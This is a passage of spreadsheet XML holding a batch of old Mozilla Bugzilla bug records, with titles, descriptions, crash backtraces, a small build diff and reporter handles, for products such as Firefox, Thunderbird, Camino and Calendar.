not text/css.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE_GRAVEYARD-230750</t>
  </si>
  <si>
    <t>directory code treats mapi address books like ldap servers</t>
  </si>
  <si>
    <t>When palm sync creates an address book it creates it with type MAPIDirectory.
But some of the display code treats MAPIDirectories more like ldap directories
than personal address books which is what they really are.  I'm not quite sure
of the usefullness of the MAPIDirectory type but for now I'm going to make the
code treat MAPI directories more like personal address books. Patch upcoming.</t>
  </si>
  <si>
    <t>MOZILLA.ORG-401586</t>
  </si>
  <si>
    <t xml:space="preserve">CVS Account Request - Johnathan Nightingale </t>
  </si>
  <si>
    <t>Created attachment 286573
Public ssh key
Will get some vouchers to chime in.  I've sent a scanned PDF of the contributor form to marcia.  SSH key attached let me know if there is other information needed.</t>
  </si>
  <si>
    <t>CALENDAR-459021</t>
  </si>
  <si>
    <t>Invite Attendees dialog: automatically expand address book mailing lists</t>
  </si>
  <si>
    <t>Would be nice if the attendee pane could auto expand lists defined in the address book.</t>
  </si>
  <si>
    <t>WSourdeau</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-206850</t>
  </si>
  <si>
    <t>program does not start at all</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 5.2 Mac_PowerPC)
Build Identifier: Camino 0.7
I tried to open the program but it always freezes in the first window - i canÂ´t even see a 
browser window (but the harddisk seems to work a lot..). i deleted camino several times 
and downloaded it again - no changes.
Reproducible: Always
Steps to Reproduce:
1. start the program
2. 
3.
Actual Results:  
nothing at all except that i see the the first window (version information logo)
Expected Results:  
normal program start</t>
  </si>
  <si>
    <t>parker23</t>
  </si>
  <si>
    <t>FIREFOX-317505</t>
  </si>
  <si>
    <t>Add relative dates to places queries</t>
  </si>
  <si>
    <t>Places queries have begin and end dates but it is common to want everything since last week or today which are not currently representable. Add these.</t>
  </si>
  <si>
    <t>CORE-103916</t>
  </si>
  <si>
    <t>nsStdURL::GetSpec()  is 2.6% of main1()</t>
  </si>
  <si>
    <t>Func
		#calls	F ms	F+D ms	Module
-------------------------------------------------------------
main1
		   1	0
3279ms
mozilla.exe
nsStdURL::GetSpec
2832
0
   86ms	necko.dll
That is about 2.6% of main1's time
In general nsStdURL:: allocates way too many times (small quantities but too
many allocations).</t>
  </si>
  <si>
    <t>CORE-730074</t>
  </si>
  <si>
    <t>XrayWrapper.cpp:115:1: warning: missing braces around initializer for â€˜void* [40]â€™ [-Wmissing-braces]</t>
  </si>
  <si>
    <t>Filing bug on this gcc build warning:
{
XrayWrapper.cpp:115:1: warning: missing braces around initializer for â€˜void* [40]â€™ [-Wmissing-braces
}
From looking at other JSClass definitions it looks like we should be using JSCLASS_NO_OPTIONAL_MEMBERS which includes braces around its last contents (by way of JSCLASS_NO_INTERNAL_MEMBERS )
http://mxr.mozilla.org/mozilla-central/source/js/src/jsapi.h#3488</t>
  </si>
  <si>
    <t>CORE-448897</t>
  </si>
  <si>
    <t>Add plugin and plugins to dictionary</t>
  </si>
  <si>
    <t>Add plugin and plugins to dictionary.
Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1a2pre) 
Gecko/2008080103 Minefield/3.1a2pre</t>
  </si>
  <si>
    <t>CORE-67233</t>
  </si>
  <si>
    <t>Inconsistently applying keyCode/charCodes</t>
  </si>
  <si>
    <t>While reviewing the charCode and keyCode property of the event object I have
noticed that the values are inconsistantly applied.  A good example is (assuming
 ^ represents the control key) ^c returns a charCode of 99 (the c
character) but ^[ returns a keyCode of 27 (escape character).  If alpha
characters used in combination with the control key return the alpha character
then the symbolic characters in combination with the control key should return
the symbolic character!
I think that control + key combination should ALWAYS return the keycode in order
to separate them from the normal pressing of a key.  This may also be true of
the alt key but not as importantly as the character key since the control + key
combinations have pre-defined meanings in ASCII.
In a way I think it might be best if a keyCode is always provided and a
charCode only provided when a displayable key has been pressed.
Jeff Yates.</t>
  </si>
  <si>
    <t>pbwiz</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-221513</t>
  </si>
  <si>
    <t>Pages for order transactions rendered incorrectly on fleurop.de</t>
  </si>
  <si>
    <t>The standard pages on this webpage are shown correctly in Mozilla. But when you
start an order transaction the pages are displayed incorrectly. The positions of
information links and buttons are spread all over the place. The whole layout
is destroyed.</t>
  </si>
  <si>
    <t>ansgar</t>
  </si>
  <si>
    <t>FIREFOX-324763</t>
  </si>
  <si>
    <t>Tabs that lack focus can no longer be selected</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9a1) Gecko/20060126 Firefox/1.6a1
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9a1) Gecko/20060126 Firefox/1.6a1
When a new tab is opened the original tab is no longer able to be selected.  The only way to return to the original tab is to close the new tab.  This appears to have regressed since the 20060125 nightly build.   
Reproducible: Always
Steps to Reproduce:
1. Open a new tab
2. Attempt to select the previous tab
3. 
Actual Results:  
Unfocused tab is not able to be selected.
Expected Results:  
Unfocused tab should regain focus when clicked on.</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-297100</t>
  </si>
  <si>
    <t>Tell people about Reporter at the top of Hendrix</t>
  </si>
  <si>
    <t>I've seen Hendrix reports of broken sites these should go in Reporter. So the
blurb at the top of Hendrix should mention Reporter.</t>
  </si>
  <si>
    <t>CORE-387512</t>
  </si>
  <si>
    <t>block with :first-line pseudo-element subsequent text vanishes</t>
  </si>
  <si>
    <t>Created attachment 271613
test case
When styling the first line of a block with the ::first-line pseudo-element then only the second line of a block will display all subsequent lines of text disappear.
Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.9a7pre) Gecko/2007070917 Minefield/3.0a7pre ID:2007070917
Regressed before 20070702 (fails with the last available Camino build).</t>
  </si>
  <si>
    <t>CORE-335225</t>
  </si>
  <si>
    <t>Specific Hindi characters rendered incorrectly. This completely changes the word.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2
A word in hindi which should sound like 'Dikhta' is rendered incorrectly to sound like 'Dakitha'. IE 6 renders the same URL above properly.
The bug I guess is in rendering the half circled curves on top of a hindi letter which is shifted to adjacent hindi letter in the word.
If have not conveyed the problem successfully. You will be able to easily catch it by showing the above URL to a perosn who understand Hindi
Many Thanks
Reproducible: Always
Steps to Reproduce:
Just load the URL above in a the latest version of Firefox browser
Actual Results:  
The curves on top of the letter are associated with the adjacent letter in the word. 
Expected Results:  
The curve should be with on top of the letter they were meant to be
Please load the above URL in IE6 and see the difference.</t>
  </si>
  <si>
    <t>hitesh.haran</t>
  </si>
  <si>
    <t>CORE-199500</t>
  </si>
  <si>
    <t>Crash in [@ nsHttpConnectionMgr::OnSocketEvent] if PSM is not installed</t>
  </si>
  <si>
    <t>When attempting to load http://www.lovepop.net/enter.html I get an immediate
crash in nsHttpConnectionMgr::OnSocketEvent. This is a CVS Trunk pull from
today. Platform is FreeBSD 5.0-CURRENT moz is built with pthreads).
---
0x28d0bb4b in nsHttpConnectionMgr::OnSocketEvent(unsigned unsigned void*) (
    this=0x28a62fe9 type=3503345872 uparam=3503345872 vparam=0x8cdd900)
    at nsHttpConnectionMgr.cpp:842
842                 NS_RELEASE(conn)
(gdb) bt
#0  0x28d0bb4b in nsHttpConnectionMgr::OnSocketEvent(unsigned unsigned void*)
    (this=0x28a62fe9 type=3503345872 uparam=3503345872 vparam=0x8cdd900)
    at nsHttpConnectionMgr.cpp:842
#1  0x28cc8465 in nsSocketTransportService::ServiceEventQ() (this=0x814c800)
    at nsSocketTransportService2.cpp:300
#2  0x28cc928c in nsSocketTransportService::Run() (this=0x814c800)
    at nsSocketTransportService2.cpp:606
#3  0x28a13c54 in nsThread::Main(void*) (arg=0x8164be0) at nsCOMPtr.h:690
#4  0x2816b299 in PR_Select () from ./libnspr4.so
#5  0x2882c46e in _thread_start () from /usr/lib/libc_r.so.5
(gdb)</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-308943</t>
  </si>
  <si>
    <t>Remove autofill build-id for non-browser products on guided enter bug page</t>
  </si>
  <si>
    <t>The guided bug page autofills the build-id with the userAgent from the browser.  
This is only appropriate for the browser products (firefox/seamonkey/camino).
For non-browser products (thunderbird sunbird) the build-id of the browser
does not accurately report which version of the non-browser product they are
using and discourages users from supplying the build id because the field
already looks filled.
Steps to reproduce:
Guided bug page for Thunderbird
https://bugzilla.mozilla.org/enter_bug.cgi?product=Thunderbird&amp;format=guided
Guided bug page for Sunbird
https://bugzilla.mozilla.org/enter_bug.cgi?product=Calendar&amp;format=guided
Actual results:  Build id field is filled with BROWSER user agent string
Expected results:  Build id field is blank
Note: the guided help page inserts two lines like the following into the bug
description:
User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.10)
Gecko/20050716 Firefox/1.0.6
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.10)
Gecko/20050716 Firefox/1.0.6
Leaving the Build Id field blank will only leave the build-id line blank and
the user-agent line will still contain the browswer info so this change does
not risk losing any clues from the browser build id.</t>
  </si>
  <si>
    <t>CORE-222539</t>
  </si>
  <si>
    <t>[FIX]xml pretty printing is broken [last worked in 10/10 build]</t>
  </si>
  <si>
    <t>xml pretty printing is broken [last worked in 10/10 build]</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-262853</t>
  </si>
  <si>
    <t>Filter out these authors should be Only show changes by these authors</t>
  </si>
  <si>
    <t>TOOLKIT-432383</t>
  </si>
  <si>
    <t>Validation errors in license.html</t>
  </si>
  <si>
    <t>Created attachment 319509
Fix errors in both license.html copies
There are a couple of errors in license.html that break validation.  They were fixed in the abortive html-&gt;xhtml conversion but we should fix them in the html file.  (One the  entity originates in relic/make-list-id and also needs to be fixed there at some point.)</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-262513</t>
  </si>
  <si>
    <t>New Extension: Biofox</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 rv:1.7.3) Gecko/20040913 Firefox/0.10
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 rv:1.7.3) Gecko/20040913 Firefox/0.10
I would like my extension to be listed on update.mozilla site. The extension is
called bioFOX. Its current version is 0.3. This project has also been hosted on
mozdev mirrors. The URL for the xpi is
http://downloads.mozdev.org/biofox/biofox.xpi. 
Thanks
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>saleem.m</t>
  </si>
  <si>
    <t>SEAMONKEY-151520</t>
  </si>
  <si>
    <t>Bookmarks submenu stays open</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows U Win98 en-US rv:1.1a) Gecko/20020611
BuildID:    2002061104
When I try to move a saved bookmark in Bookmarks menu in Toolbar from one 
location (root) to another (subfolder) the subfolder opens and it should and I
can drop the link there. When I try to move another link that subfolder stays
open and other subfolders open above it.
Reproducible: Always
Steps to Reproduce:
1. Click on the Bookmarks toolbar menu (you have to have subfolders in the
bookmarks).
2. Drag a link over a subfolder and wait until it opens.
3. Drop a bookmark into the subfolder.
4. Try step 2 with another bookmark.
5. Try to drop the bookmark into another subfolder than in step 3.
Actual Results:  The subfolder from step 3 stays open even after the mouse is
moved over another subfolder and it opens (two subfolders are opened).
Expected Results:  The first subfolder should close.</t>
  </si>
  <si>
    <t>miha</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-391402</t>
  </si>
  <si>
    <t>Potential IMAP URL queueing regression</t>
  </si>
  <si>
    <t>It seems that a certain IMAP Url sequence that I'm using for the new roaming service may have exposed a potential glitch in the IMAP URL queueing setup.
Right before I start to send off a request to save an attachment part from a message (non-cached message) I was calling |UpdateFolder()| on the listened folder (not INBOX). Then I build a to-do list of update messages to process (saving a TOC file is the first step). Then one at a time I process each message. This was working before the patch to fix bug 381992 was landed. However afterwords I can only get the attachment to save correctly if I remove my |UpdateFolder()| call. 
When the |UpdateFolder| call is made I see the |OnStartRunningUrl| call made in |nsMsgSaveListener| however I never see any calls made from relatively important libmime functions (like |imeObject_parse_begin()|) or OnStopRequest/OnDataAvailable. As mentioned above removing the |UpdateFolder()| call fixes the issue and attachments are saved just fine.
A suggested cause of the regression would be the changes from bug 381992.
It should be noted that this has only happened on a queued attachment URL. We have not been able to come up with a usable test-case at the moment (outside of my roaming patch).</t>
  </si>
  <si>
    <t>nick.kreeger</t>
  </si>
  <si>
    <t>SKYWRITER_GRAVEYARD-479303</t>
  </si>
  <si>
    <t>When you resize the window the font changes</t>
  </si>
  <si>
    <t>:)</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-348593</t>
  </si>
  <si>
    <t>telehispanic.com - cannot sign in using Firefox</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6
After entering username and password the browser is not recognised by the web page when either.. clicking on the sign in button or using the enter key from the keyboard itself.
Reproducible: Always
Steps to Reproduce:
1.enter username
2.enter password
3.sign in
Actual Results:  
unable to sign in to this page
Expected Results:  
opened a new window with account information</t>
  </si>
  <si>
    <t>planetjetboy</t>
  </si>
  <si>
    <t>FIREFOX-487558</t>
  </si>
  <si>
    <t>Use satchel notifications to track form data</t>
  </si>
  <si>
    <t>The fix in bug 487541 reimplements the logic that satchel uses to decide if an input should be saved. Bug 487556 will provide the satchel notifications so when that's fixed we should use them in weave.</t>
  </si>
  <si>
    <t>CORE-190610</t>
  </si>
  <si>
    <t>border in form objects is visible even with border-style:none and border-width:0</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 de-AT rv:1.3b) Gecko/20030124
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 de-AT rv:1.3b) Gecko/20030124
Form elements input and textarea with
style=border-style:noneborder-width:0px
should be without border.
In Mozilla the border is still visible.
In Mozilla 1.2.1 the border is invisible as it sould be.
Reproducible: Always
Steps to Reproduce:
1. Launch http://seticlass011104.gmxhome.de/border_style.html
Actual Results:  
The border around input and textarea elements is visible.
Expected Results:  
The border around input and textarea elements should be invisible.</t>
  </si>
  <si>
    <t>layout.form-controls</t>
  </si>
  <si>
    <t>patrick.wulff</t>
  </si>
  <si>
    <t>CORE-508128</t>
  </si>
  <si>
    <t>httpd.js running in xpcshell GC's too infrequently</t>
  </si>
  <si>
    <t>When repeatedly running mochitest on content/media/test/test_seek.html I can see in Task Manager or by using `top` that xpcshell.exe's memory usage rapidly increases with every run. It expands by a few hundred megabytes every reload of test_seek.html. If you wait long enough (I assume) a garbage collection is done and the memory shrinks back down to a few hundred megabytes. When running this many times it's easy to expand the memory usage to over a gigabyte.
Usually the first run expands the memory usage to a few hundred magabytes but if I add a call to gc() at the end of _connectionClosed in httpd.js:719 memory always stays at around 9MB.
Note that test_seek is disabled on Windows because as it fails intermittently. This is because either necko or httpd.js can't handle suspending or resuming connections this is a separate issue and I'm looking into this. If test_seek.html appears to not terminate that's not related to this gc issue. If I set the media code to not try to suspend/resume connections this memory bloat still happens so that's not the cause.
This bug happens on at least Linux and Windows. You have to edit content/media/test/Makefile.in to enable test_seek.html on Windows if you want to test on Windows.
STR:
1. Run mochitest on content/media/test_seek.html
2. Observe memory usage of xpcshell.exe in `top`/Task Manager.
3. Repeatedly reload test_seek.html page note ever increasing memory usage.</t>
  </si>
  <si>
    <t>TOOLKIT-468705</t>
  </si>
  <si>
    <t>cache the result of _getSyncTableStatement in nsDBFlush</t>
  </si>
  <si>
    <t>Since the statement does not change we could cache it instead of generating it every time.</t>
  </si>
  <si>
    <t>CORE-325386</t>
  </si>
  <si>
    <t>[FIX] Crash when trying to create an htmleditor instance [@ nsEditor::GetDOMEventReceiver]</t>
  </si>
  <si>
    <t>See upcoming testcase you need to test the testcase locally to get the crash.</t>
  </si>
  <si>
    <t>FIREFOX-251589</t>
  </si>
  <si>
    <t>XUL tab focus indication should appear inside the tab</t>
  </si>
  <si>
    <t>When XUL tabs get focused (they do as of bug 175893) the focus outline is
currently appearing outside of the tab (because of fix for bug 151375). It
should appear inside.</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-504692</t>
  </si>
  <si>
    <t>Improve slow queries</t>
  </si>
  <si>
    <t>I turned on the slow query logger this morning for a bit and found a half dozen queries that took over a few seconds to complete.  I will attempt to fix that in this bug.</t>
  </si>
  <si>
    <t>FIREFOX-263940</t>
  </si>
  <si>
    <t>delete nonexistent cookie: prefs dialog OK button doesn't work</t>
  </si>
  <si>
    <t>Tools -&gt; Options -&gt; Privacy -&gt; Cookies -&gt; View Cookies
Delete at least one cookie
Scroll to the bottom of the list
Lo! What are all these blank lines at the end of the list? Select one...
Delete the blank line
Click OK to exit the View Cookies dialog
Click OK to exit Preferences
-- Nothing happens. OK is a dead button.
   You can cancel out of the dialog. There is a JavaScript error.
No similar error seems to exist in a 20041006 Suite trunk build.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-345506</t>
  </si>
  <si>
    <t>input[type=boolean].xf-value has no effect missing class=xf-value in XBL</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4
Attempting to style a checkbox value ie input[type=boolean] .xf-value has no effect.  After seaching XBL for input control ie input-xhtml.xml I see that there is no class attr on the input control.
I see why no reason this was ommited.
Reproducible: Always</t>
  </si>
  <si>
    <t>BUGZILLA-414269</t>
  </si>
  <si>
    <t>Move the knobs to appear below the enter comments area (like it used to)</t>
  </si>
  <si>
    <t>Till bug 414236 is implemented knobs should be brought back to their original place i.e. right below the New comment textarea. Else when you comment you have to scroll down to commit your changes.</t>
  </si>
  <si>
    <t>SEAMONKEY-153164</t>
  </si>
  <si>
    <t>embed base library include in XPCOM_GLUE_LIBS</t>
  </si>
  <si>
    <t>This is wrong and needs to be fixed:
Index: configure.in
===================================================================
RCS file: /cvsroot/mozilla/configure.inv
retrieving revision 1.1045
diff -u -r1.1045 configure.in
--- configure.in	11 Jun 2002 19:25:38 -0000	1.1045
+++ configure.in	20 Jun 2002 17:28:04 -0000
@@ -42999 +42999 @@
 dnl = Cleanup section for misc ordering snafus
 dnl =
 if test $_WIN32_MSVC then
-    XPCOM_GLUE_LIBS='$(DIST)/lib/$(LIB_PREFIX)xpcomglue.$(LIB_SUFFIX)
$(DIST)/lib/$(LIB_PREFIX)string_s.$(LIB_SUFFIX)
$(DIST)/lib/$(LIB_PREFIX)string_obsolete_s.$(LIB_SUFFIX)
$(DIST)/lib/$(LIB_PREFIX)embed_base_s.$(LIB_SUFFIX)'
+    XPCOM_GLUE_LIBS='$(DIST)/lib/$(LIB_PREFIX)xpcomglue.$(LIB_SUFFIX)
$(DIST)/lib/$(LIB_PREFIX)string_s.$(LIB_SUFFIX)
$(DIST)/lib/$(LIB_PREFIX)string_obsolete_s.$(LIB_SUFFIX) 
 else
-    XPCOM_GLUE_LIBS='-L${DIST}/bin -L${DIST}/lib -lxpcomglue -lstring_s
-lstring_obsolete_s -lembed_base_s'
+    XPCOM_GLUE_LIBS='-L${DIST}/bin -L${DIST}/lib -lxpcomglue -lstring_s
-lstring_obsolete_s
 fi
 dnl ========================================================</t>
  </si>
  <si>
    <t>MOZILLA_QA_GRAVEYARD-534744</t>
  </si>
  <si>
    <t>Mozmill Automation</t>
  </si>
  <si>
    <t>Software update tests should be able to send detailed update reports to brasstacks</t>
  </si>
  <si>
    <t>We are able to send reports to couchdb now. Only support for restart tests is missing. That will be done in bug 533227.
With that implementation the software update tests should be able to send reports to brasstacks. The question is if they should be part of the normal mozmill results or if we should track those in a separate couchdb database.
Would be great if we could have all the tests in one db but if that makes things harder lets go with another database. Mikeal any objections?</t>
  </si>
  <si>
    <t>FIREFOX-487739</t>
  </si>
  <si>
    <t>places ifdef checks MACOSX instead of XP_MACOSX</t>
  </si>
  <si>
    <t>browser/components/places/content/places.xul
298 #ifdef MACOSX
299                       label=
300 #else
301                       label=
302 #endif
Probably want XP_MACOSX there.</t>
  </si>
  <si>
    <t>CORE-516897</t>
  </si>
  <si>
    <t>64bit-only crash [@ GetGCThingFlags] [@ JS_CallTracer] with setter watch gc</t>
  </si>
  <si>
    <t>Using a 64-bit js shell build on 32-bit Leopard this crashes.  (opt or debug with or without -j.)
this.__defineSetter__(x gc)
this.watch(xfunction(){return})
x = 3
It usually dereferences 0x0fe0 or 0x000c but I don't trust GC so I'm filing as security-sensitive.  Oh and sometimes it divides by 0 instead.
As usual I'm curious why this is 64bit-only.  I used dvander's build instructions from bug 489146 comment 27.</t>
  </si>
  <si>
    <t>SEAMONKEY-193891</t>
  </si>
  <si>
    <t>Wrong message: Maximum Message Size set in Preferences</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.3b) Gecko/20030210
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.3b) Gecko/20030210
The text 1038 in file mime.properties is not exact !
Reproducible: Always
Steps to Reproduce:
1. In 'Disk Space' of the dialog 'Mail &amp; Newsgroups Account Settings...' check
Do not download messages locally that are larger than... 1 KB 
2. send yourself a bigger message
3. look bottom of the message display panel
Actual Results:  
you read :
This message exceeded the Maximum Message Size set in Preferences so we have
only downloaded the first few lines from the mail server.
Expected Results:  
It should say 'Account Settings' instead of 'Preferences'</t>
  </si>
  <si>
    <t>tanguy.christian</t>
  </si>
  <si>
    <t>TOOLKIT-303541</t>
  </si>
  <si>
    <t>Text link widget doesn't getPreventDefault</t>
  </si>
  <si>
    <t>This makes it impossible to override the default action as mentioned in bug
280065 comment 32.</t>
  </si>
  <si>
    <t>THUNDERBIRD-428144</t>
  </si>
  <si>
    <t>Fix Tb's license.html generation following bug 368091</t>
  </si>
  <si>
    <t>Once bug 368091 lands Tb will need to preprocess toolkit/content/license.html to include its EULA block before handing that to the Makefile goo I wrote for bug 427316.
Question 1: Does Tb also want to store the license in a jar like Firefox is doing or do you only ever intend to care about the stand-alone license.html file?
Question 2: Where do you want your app-license.html file (the HTML snippet for the EULA block) to live?  Firefox's will live in browser/base/content/overrides since that makes sense for the structure of the jar it ends up in (and parallels Fx's locale chrome overrides) but that might not make sense for Tb.
I have what I think is a fix for this right now rebuilding my Tb tree so I can test.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-145242</t>
  </si>
  <si>
    <t>Greek</t>
  </si>
  <si>
    <t>lib.ntua.gr - [LAYER] library search does not support Mozilla</t>
  </si>
  <si>
    <t>Javascipt DOM error the page might be unable to reach at some times try later 
if down.</t>
  </si>
  <si>
    <t>greek</t>
  </si>
  <si>
    <t>pstath</t>
  </si>
  <si>
    <t>CORE-251475</t>
  </si>
  <si>
    <t>Channels should ensure that originalURI is non-null</t>
  </si>
  <si>
    <t>We should document that originalURI is never null for channels (in
nsIChannel.idl) and that setting it to null will throw.  Then we should fix our
channel impls to behave so.</t>
  </si>
  <si>
    <t>montague.bugzilla</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-445150</t>
  </si>
  <si>
    <t>te / Telugu</t>
  </si>
  <si>
    <t>[te] Firefox 3 protocol handler setup for Telugu</t>
  </si>
  <si>
    <t>Protocol handlers are a new feature in Firefox 3 that allows links like mailto:nobody@mozilla.org to be handled by a webmail application.
In order to do that the site needs to support a special API described on http://developer.mozilla.org/en/docs/Web-based_protocol_handlers.
For en-US we're currently shipping with Yahoo! Mail for mailto: and 30boxes for webcal: urls and we're on a ongoing evangelism effort to add more. Gmail and ms live mail are currently discussed in .l10n. For Telugu we'd like to do that too.
First the localization team and Mic (Michal Berman) will look at the market for the language and come up with a good candidates. Krishna we'll need your input on this the guidelines for making recommendations are on http://wiki.mozilla.org/Firefox_web_services_guidelines. Following that is a reach out by the evangelism team to try to get the vendor to support protocol handlers.
Once that happens Axel will take over in reviewing the actual implementation which will need to change the gecko.handlerService.* entries in te/browser/chrome/browser-region/region.properties. Please don't make changes to that file without getting a positive review by Axel or somebody else appointed by Mic on a patch for that change upfront.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-171215</t>
  </si>
  <si>
    <t>CocoaEmbed doesn t run with CHBrowserView.framework</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 5.14 Mac_PowerPC)
Build Identifier: CHIMERA_M1_0_1_BRANCH
see below
Reproducible: Always
Steps to Reproduce:
1.cvs co -r CHIMERA_M1_0_1_BRANCH mozilla/client.mk
2.edit .mozconfig as on 
http://www.mozilla.org/ports/fizzilla/ChimChim.html
(I tried both debug and opt)
3.make -w -f client.mk 
4. remove the const in declaration of:
 static const nsModuleComponentInfo gAppComponents[]
in chimera's AppComponents.mm 
5.make in embedding/config
6. chimera compiles and run fine
7. compile in embedding/browser/cocoa/NSBrowserView.pbproj
8. compile and run in embedding/tests/CocoaEmbed
Actual Results:  
crash during init_embedding:
###!!! ASSERTION: nsDirectoryService - Could not determine 
CurrentProcessDir.
: '*aFile' file nsDirectoryService.cpp line 237
###!!! Break: at file nsDirectoryService.cpp line 237
###!!! ASSERTION: unable to get current process directory: 'Error' file 
nsDirectoryService.cpp line 339
###!!! Break: at file nsDirectoryService.cpp line 339
###!!! ASSERTION: Setting main thread twice?: 'Error' file nsThread.cpp 
line 402
###!!! Break: at file nsThread.cpp line 402
Expected Results:  
CocoaEmbed should have inited the embeding and go on running.</t>
  </si>
  <si>
    <t>noar</t>
  </si>
  <si>
    <t>CORE-268235</t>
  </si>
  <si>
    <t>Make layout debugger show pseudo-styles</t>
  </si>
  <si>
    <t>This is a little addition to layout debugging which I found helpful.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-79535</t>
  </si>
  <si>
    <t>Site will not load at all</t>
  </si>
  <si>
    <t>Not sure why but this particular site loads a blank page for me. The only thing
that shows up is the page's title (in the title bar). Site works fine in IE 5.</t>
  </si>
  <si>
    <t>emeyer</t>
  </si>
  <si>
    <t>dan.m</t>
  </si>
  <si>
    <t>CALENDAR-350323</t>
  </si>
  <si>
    <t>show hidden calendars when they are selected.</t>
  </si>
  <si>
    <t>I personally never liked the way that the selected calendar in the listbox is the calendar in which new items are created. There is no UI hint to that anywhere. You just have to know it.
Maybe we need some checkbox in the listbox? One that gets remembered across sessions.</t>
  </si>
  <si>
    <t>thomas.benisch</t>
  </si>
  <si>
    <t>CORE-292498</t>
  </si>
  <si>
    <t>SVG Text Selection Not Supported</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 6.0 Windows NT 5.0 .NET CLR 1.1.4322)
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.8b2) Gecko/20050430 Firefox/1.0+
The SVG 1.1 Full specification clearly states that all conforming SVG viewers 
support text selection and copy: 
http://www.w3.org/TR/SVG/text.html#TextSelection
I'm opening this bug to track that capability.  I also recommend that the 
Mozilla SVG status page (http://www.mozilla.org/projects/svg/status.html) be 
updated with a line item in the Text Module called Text Selection with the 
W3C link being the afore-mentioned spec link.
Reproducible: Always
Steps to Reproduce:
1. create a SVG text element
2. view it in Mozilla+SVG browser
3. grumble as you see that you cannot select the text )
Actual Results:  
You cannot select the text )
Expected Results:  
Allow the user to select the text (even text rendered on a path)
I don't know if it bothers anyone if I say this or not but ASV allows this (if 
you are curious about how it is implemented).</t>
  </si>
  <si>
    <t>codedread</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-185766</t>
  </si>
  <si>
    <t>ht.dk - serverside identification as Netscape 4</t>
  </si>
  <si>
    <t>identifies Mozilla as Netscape 4.x
try spoofing Mozilla as MSIE and see the difference</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-407487</t>
  </si>
  <si>
    <t>Drop nsIAddressBook::abCardToEscapedVCard</t>
  </si>
  <si>
    <t>Created attachment 292218
The fix
I was just writing some documentation for nsIAddressBook.idl (for another bug) and came across this function:
string abCardToEscapedVCard(in nsIAbCard aCard)
All it does is to call aCard-&gt;ConvertToEscapedVCard(param) which happens to return a string as well...
Considering when I was documenting the function I was thinking that the proper way is just to get the escaped vcard from the card itself I think we can just drop this. There's two callers (one SM one TB) and it'll save us getting the ab service in those instances (as well as the redundant call).
I also found an rv = x return rv combo to tidy up.</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-450655</t>
  </si>
  <si>
    <t>update shipped-locales for new Beta locales for fx 3.0.2</t>
  </si>
  <si>
    <t>We're going to take a few more locales for Firefox 3.0.2 as beta releases.
The real list is not totally clear yet I'll bring that late in the game.</t>
  </si>
  <si>
    <t>MOZILLA.ORG-323317</t>
  </si>
  <si>
    <t>Please cvs copy makefile to Makefile but make the makefile dead for now</t>
  </si>
  <si>
    <t>There are two instances of /makefile in the tree i'd like to see them replaced w/ /Makefile.
The procedure needs to be:
copy the file outside of the tree
remove all the tag names
mark the file as dead for all current versions
cvs remove+commit /makefile file to make sure that there is at most 1 live (actually 0) file
copy the /Makefile into the cvs repository
cvs commit /Makefile as alive (unchanged from dead version)
this is amazingly non urgent. i'd be happy if it was done by Jan 2007.
